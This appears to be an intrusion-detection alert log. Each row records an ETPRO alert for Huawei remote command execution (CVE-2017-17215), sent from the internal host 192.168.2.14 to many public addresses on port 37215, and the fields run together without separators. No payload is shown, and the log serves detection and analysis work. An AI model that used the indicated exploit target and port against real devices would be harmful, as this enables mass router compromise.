                                                    07/10/24-08:26:11.093817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619437215192.168.2.14157.118.62.90
                                                    07/10/24-08:27:22.922579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3336437215192.168.2.14157.95.178.202
                                                    07/10/24-08:26:13.779688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257637215192.168.2.1441.156.25.221
                                                    07/10/24-08:26:28.882503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582037215192.168.2.14157.96.65.205
                                                    07/10/24-08:27:11.568589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067437215192.168.2.14197.188.100.188
                                                    07/10/24-08:26:11.567410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571837215192.168.2.1441.170.114.69
                                                    07/10/24-08:26:43.695229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650637215192.168.2.14157.253.38.77
                                                    07/10/24-08:26:25.469526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948837215192.168.2.1470.231.37.254
                                                    07/10/24-08:26:20.145425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472637215192.168.2.14197.209.40.86
                                                    07/10/24-08:26:49.863251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612637215192.168.2.14197.216.99.193
                                                    07/10/24-08:26:33.268037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409637215192.168.2.14197.251.247.42
                                                    07/10/24-08:26:36.361562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114637215192.168.2.14197.145.248.123
                                                    07/10/24-08:26:59.598590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534637215192.168.2.14157.75.16.59
                                                    07/10/24-08:26:23.322127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6053437215192.168.2.14197.43.74.100
                                                    07/10/24-08:27:20.494991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109237215192.168.2.1441.18.255.134
                                                    07/10/24-08:27:33.908493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298637215192.168.2.14103.138.227.165
                                                    07/10/24-08:26:25.443294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361237215192.168.2.14157.24.52.113
                                                    07/10/24-08:27:22.758689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922837215192.168.2.14197.205.164.252
                                                    07/10/24-08:27:10.590794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178437215192.168.2.1412.119.152.189
                                                    07/10/24-08:27:10.629470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892037215192.168.2.14157.234.50.28
                                                    07/10/24-08:26:11.144777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356237215192.168.2.14172.2.237.22
                                                    07/10/24-08:26:53.181411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608637215192.168.2.14197.219.17.175
                                                    07/10/24-08:26:41.574403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581637215192.168.2.14167.99.213.252
                                                    07/10/24-08:26:51.960962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302037215192.168.2.14157.47.126.57
                                                    07/10/24-08:26:47.879237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437037215192.168.2.14197.154.173.136
                                                    07/10/24-08:26:17.971584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753237215192.168.2.1441.29.10.3
                                                    07/10/24-08:27:08.368400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753837215192.168.2.1441.126.55.112
                                                    07/10/24-08:26:34.229660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517037215192.168.2.1441.159.148.175
                                                    07/10/24-08:26:57.595763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913837215192.168.2.1473.27.247.25
                                                    07/10/24-08:27:20.454576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274837215192.168.2.1494.167.230.164
                                                    07/10/24-08:27:28.160478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037237215192.168.2.1425.59.62.238
                                                    07/10/24-08:26:13.780678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387237215192.168.2.14191.77.251.99
                                                    07/10/24-08:26:29.874680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968637215192.168.2.14197.246.169.209
                                                    07/10/24-08:27:30.533467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974637215192.168.2.1441.194.127.227
                                                    07/10/24-08:26:17.956514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975637215192.168.2.14197.95.143.3
                                                    07/10/24-08:27:13.833154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239837215192.168.2.1464.78.189.158
                                                    07/10/24-08:27:13.816832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392037215192.168.2.1441.243.113.142
                                                    07/10/24-08:26:26.612913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685437215192.168.2.14157.124.250.16
                                                    07/10/24-08:26:15.876739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831637215192.168.2.1488.229.205.130
                                                    07/10/24-08:26:55.322018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543637215192.168.2.14197.148.104.21
                                                    07/10/24-08:27:10.544056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.1441.101.231.80
                                                    07/10/24-08:26:28.906271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045837215192.168.2.14197.147.246.211
                                                    07/10/24-08:26:48.021519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421037215192.168.2.14157.97.160.105
                                                    07/10/24-08:26:28.874415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258837215192.168.2.14157.5.93.53
                                                    07/10/24-08:26:29.746967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3996637215192.168.2.14197.144.222.162
                                                    07/10/24-08:26:59.522844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668837215192.168.2.145.47.6.98
                                                    07/10/24-08:26:52.024313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402837215192.168.2.14178.32.111.1
                                                    07/10/24-08:26:43.644990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593037215192.168.2.14130.64.233.147
                                                    07/10/24-08:26:53.198979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445437215192.168.2.14157.95.124.17
                                                    07/10/24-08:27:11.518597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260837215192.168.2.1441.53.189.202
                                                    07/10/24-08:26:23.307876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156237215192.168.2.1441.183.210.46
                                                    07/10/24-08:26:25.479051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196837215192.168.2.14157.170.193.58
                                                    07/10/24-08:26:33.227132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848037215192.168.2.1441.3.131.169
                                                    07/10/24-08:26:20.113849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383637215192.168.2.14197.6.123.232
                                                    07/10/24-08:26:25.469332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407637215192.168.2.14157.2.232.237
                                                    07/10/24-08:26:55.386841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282237215192.168.2.14157.131.184.79
                                                    07/10/24-08:27:10.638675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686037215192.168.2.1441.254.90.245
                                                    07/10/24-08:27:13.991583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531837215192.168.2.1466.152.132.11
                                                    07/10/24-08:26:57.522324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897637215192.168.2.14197.164.138.160
                                                    07/10/24-08:26:45.633104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968437215192.168.2.14197.54.51.204
                                                    07/10/24-08:26:42.161476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951437215192.168.2.14197.203.176.222
                                                    07/10/24-08:26:36.406551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104637215192.168.2.14157.255.119.182
                                                    07/10/24-08:27:13.978564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660237215192.168.2.14157.65.182.150
                                                    07/10/24-08:27:19.295314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479037215192.168.2.14157.241.122.88
                                                    07/10/24-08:26:43.861312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162037215192.168.2.14157.180.30.239
                                                    07/10/24-08:26:59.822867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037837215192.168.2.14157.104.209.255
                                                    07/10/24-08:26:31.058649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289037215192.168.2.14157.68.153.193
                                                    07/10/24-08:27:08.335280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146037215192.168.2.14197.105.126.197
                                                    07/10/24-08:26:22.282645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621237215192.168.2.14157.5.217.18
                                                    07/10/24-08:26:38.578082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677237215192.168.2.14157.178.165.77
                                                    07/10/24-08:27:07.376738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133837215192.168.2.14157.151.240.218
                                                    07/10/24-08:27:08.350346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206237215192.168.2.14157.153.182.175
                                                    07/10/24-08:26:53.247810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396837215192.168.2.14140.81.254.59
                                                    07/10/24-08:26:13.666761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573237215192.168.2.14157.87.64.40
                                                    07/10/24-08:27:02.722958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966637215192.168.2.14177.195.6.59
                                                    07/10/24-08:26:38.657439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917237215192.168.2.14198.93.148.255
                                                    07/10/24-08:27:05.239368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093437215192.168.2.14197.25.153.218
                                                    07/10/24-08:26:13.842272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851637215192.168.2.14197.180.32.246
                                                    07/10/24-08:26:43.842047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507037215192.168.2.14157.152.145.55
                                                    07/10/24-08:27:17.034414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843037215192.168.2.1417.71.67.96
                                                    07/10/24-08:27:13.891994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044437215192.168.2.14197.22.249.87
                                                    07/10/24-08:27:19.299032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856037215192.168.2.14157.144.24.212
                                                    07/10/24-08:26:29.875452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849837215192.168.2.14197.148.183.242
                                                    07/10/24-08:26:59.640486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334437215192.168.2.1451.196.133.221
                                                    07/10/24-08:26:53.168197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835837215192.168.2.1441.182.250.94
                                                    07/10/24-08:26:47.854499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496437215192.168.2.14157.184.179.181
                                                    07/10/24-08:26:20.152132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055837215192.168.2.14157.131.194.192
                                                    07/10/24-08:26:41.378984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715437215192.168.2.14157.211.44.106
                                                    07/10/24-08:27:28.166168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426637215192.168.2.14197.107.24.235
                                                    07/10/24-08:27:32.567631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919837215192.168.2.1441.80.164.29
                                                    07/10/24-08:26:51.997366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056237215192.168.2.1441.242.59.158
                                                    07/10/24-08:26:38.633686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391837215192.168.2.1441.173.104.75
                                                    07/10/24-08:26:42.154105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235437215192.168.2.14197.227.38.209
                                                    07/10/24-08:26:43.870525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098437215192.168.2.1441.63.44.228
                                                    07/10/24-08:26:33.156577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320237215192.168.2.1441.47.161.67
                                                    07/10/24-08:26:59.538381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462237215192.168.2.14157.110.186.126
                                                    07/10/24-08:27:10.542013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987637215192.168.2.14157.174.208.93
                                                    07/10/24-08:27:14.819517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618837215192.168.2.14197.110.95.172
                                                    07/10/24-08:26:28.911509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383437215192.168.2.14197.128.38.177
                                                    07/10/24-08:26:36.407750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286437215192.168.2.1441.95.147.197
                                                    07/10/24-08:26:59.821944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438637215192.168.2.14157.95.32.188
                                                    07/10/24-08:26:20.162511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899437215192.168.2.1441.15.61.67
                                                    07/10/24-08:27:14.865021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796637215192.168.2.14197.125.165.148
                                                    07/10/24-08:26:28.750932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761637215192.168.2.14197.8.133.239
                                                    07/10/24-08:26:42.404387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462637215192.168.2.14197.169.115.21
                                                    07/10/24-08:26:55.458086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060637215192.168.2.14197.193.250.74
                                                    07/10/24-08:26:59.841961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961437215192.168.2.14197.117.227.217
                                                    07/10/24-08:26:13.778157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861237215192.168.2.1441.192.102.16
                                                    07/10/24-08:26:52.005706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272637215192.168.2.14168.143.74.44
                                                    07/10/24-08:27:13.988913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884037215192.168.2.14147.239.135.231
                                                    07/10/24-08:27:22.835700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332637215192.168.2.14197.8.155.200
                                                    07/10/24-08:26:11.576157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4983037215192.168.2.1441.71.243.126
                                                    07/10/24-08:26:36.322719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505837215192.168.2.14197.134.226.56
                                                    07/10/24-08:27:33.818731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833437215192.168.2.14157.213.218.11
                                                    07/10/24-08:26:59.637251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984237215192.168.2.1441.88.197.58
                                                    07/10/24-08:27:27.041240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908037215192.168.2.1441.116.129.166
                                                    07/10/24-08:26:31.060158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545037215192.168.2.14197.74.204.31
                                                    07/10/24-08:27:13.996170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432437215192.168.2.14139.132.227.37
                                                    07/10/24-08:26:43.685142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3682037215192.168.2.14157.101.65.169
                                                    07/10/24-08:26:13.768963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003037215192.168.2.1441.228.77.48
                                                    07/10/24-08:26:38.518951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687637215192.168.2.1441.230.251.138
                                                    07/10/24-08:27:32.556430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533637215192.168.2.14197.208.158.58
                                                    07/10/24-08:26:14.740635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501837215192.168.2.14203.154.240.215
                                                    07/10/24-08:26:28.876491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4648037215192.168.2.14197.224.187.70
                                                    07/10/24-08:26:57.650835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3556637215192.168.2.14157.214.236.115
                                                    07/10/24-08:26:49.783625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723637215192.168.2.1441.65.64.216
                                                    07/10/24-08:27:20.523162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886237215192.168.2.14220.205.94.195
                                                    07/10/24-08:27:08.417840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575037215192.168.2.14157.166.39.41
                                                    07/10/24-08:26:28.746894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740037215192.168.2.14157.127.236.142
                                                    07/10/24-08:26:31.069203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821837215192.168.2.1451.9.236.140
                                                    07/10/24-08:26:47.986495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355437215192.168.2.14157.203.240.201
                                                    07/10/24-08:26:42.349128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690237215192.168.2.1441.94.222.44
                                                    07/10/24-08:26:48.012279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998637215192.168.2.14197.158.136.98
                                                    07/10/24-08:26:59.800330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998037215192.168.2.14157.218.186.29
                                                    07/10/24-08:27:16.994727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678037215192.168.2.1441.203.10.172
                                                    07/10/24-08:27:10.561915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699637215192.168.2.14157.196.54.249
                                                    07/10/24-08:26:17.985720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483637215192.168.2.1446.97.1.199
                                                    07/10/24-08:27:02.743093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726037215192.168.2.14197.67.34.23
                                                    07/10/24-08:26:15.788826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791037215192.168.2.14197.149.13.241
                                                    07/10/24-08:27:19.174842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5900037215192.168.2.14197.154.212.225
                                                    07/10/24-08:27:28.070223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621237215192.168.2.14156.155.71.42
                                                    07/10/24-08:26:34.202822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3336237215192.168.2.1466.154.77.82
                                                    07/10/24-08:27:02.702114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287237215192.168.2.14218.37.183.177
                                                    07/10/24-08:27:20.521213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774637215192.168.2.14197.95.251.247
                                                    07/10/24-08:26:17.978087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043437215192.168.2.14197.20.15.251
                                                    07/10/24-08:26:51.999483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080037215192.168.2.14197.38.180.131
                                                    07/10/24-08:26:57.525834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843837215192.168.2.14157.179.38.202
                                                    07/10/24-08:27:05.151857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4236637215192.168.2.1441.168.11.42
                                                    07/10/24-08:26:41.507674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027037215192.168.2.14147.50.16.70
                                                    07/10/24-08:26:38.581201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014437215192.168.2.14197.230.25.92
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708437215192.168.2.1493.89.186.154
                                                    07/10/24-08:26:38.598887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468837215192.168.2.14197.49.108.212
                                                    07/10/24-08:26:59.623899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688837215192.168.2.1441.125.229.27
                                                    07/10/24-08:26:34.187520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3634037215192.168.2.1441.164.129.124
                                                    07/10/24-08:27:10.651918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052837215192.168.2.14197.108.127.254
                                                    07/10/24-08:27:11.489140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864637215192.168.2.1445.215.20.215
                                                    07/10/24-08:27:19.306995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526837215192.168.2.14197.210.98.82
                                                    07/10/24-08:26:18.008169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674237215192.168.2.14157.87.149.242
                                                    07/10/24-08:26:53.192031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942837215192.168.2.14157.108.107.169
                                                    07/10/24-08:26:52.013790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4699237215192.168.2.1441.209.118.183
                                                    07/10/24-08:26:59.564430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155437215192.168.2.14197.11.2.72
                                                    07/10/24-08:26:36.367348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368237215192.168.2.1469.157.206.84
                                                    07/10/24-08:26:38.576463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6088837215192.168.2.14157.1.114.238
                                                    07/10/24-08:27:02.975587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814237215192.168.2.14157.151.71.96
                                                    07/10/24-08:27:05.129960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065837215192.168.2.1441.172.125.63
                                                    07/10/24-08:26:57.644790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250637215192.168.2.14197.45.163.175
                                                    07/10/24-08:26:11.606817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051037215192.168.2.14157.202.85.97
                                                    07/10/24-08:27:30.489960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5889437215192.168.2.14157.34.45.185
                                                    07/10/24-08:26:13.779688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537837215192.168.2.14197.230.151.250
                                                    07/10/24-08:27:31.532371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472037215192.168.2.1441.19.119.86
                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3635237215192.168.2.14157.151.175.175
                                                    07/10/24-08:27:10.554172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543237215192.168.2.1441.154.224.191
                                                    07/10/24-08:27:11.512071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640837215192.168.2.1441.239.68.73
                                                    07/10/24-08:26:41.437345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926837215192.168.2.14157.198.252.59
                                                    07/10/24-08:26:22.301586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634237215192.168.2.14157.38.14.166
                                                    07/10/24-08:27:23.504767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465837215192.168.2.1441.14.249.85
                                                    07/10/24-08:27:02.812422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532237215192.168.2.14157.236.195.136
                                                    07/10/24-08:26:34.224904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637037215192.168.2.14157.22.2.99
                                                    07/10/24-08:26:57.670364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6012437215192.168.2.1441.73.37.202
                                                    07/10/24-08:26:59.559919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571837215192.168.2.14157.64.92.31
                                                    07/10/24-08:27:30.549357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5963037215192.168.2.14133.201.129.208
                                                    07/10/24-08:26:17.997409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555637215192.168.2.14197.201.191.225
                                                    07/10/24-08:26:11.105620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469637215192.168.2.1495.51.118.14
                                                    07/10/24-08:26:28.904469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382637215192.168.2.14157.223.178.177
                                                    07/10/24-08:27:17.054152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148637215192.168.2.14157.105.55.182
                                                    07/10/24-08:27:23.848972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534237215192.168.2.14157.139.231.103
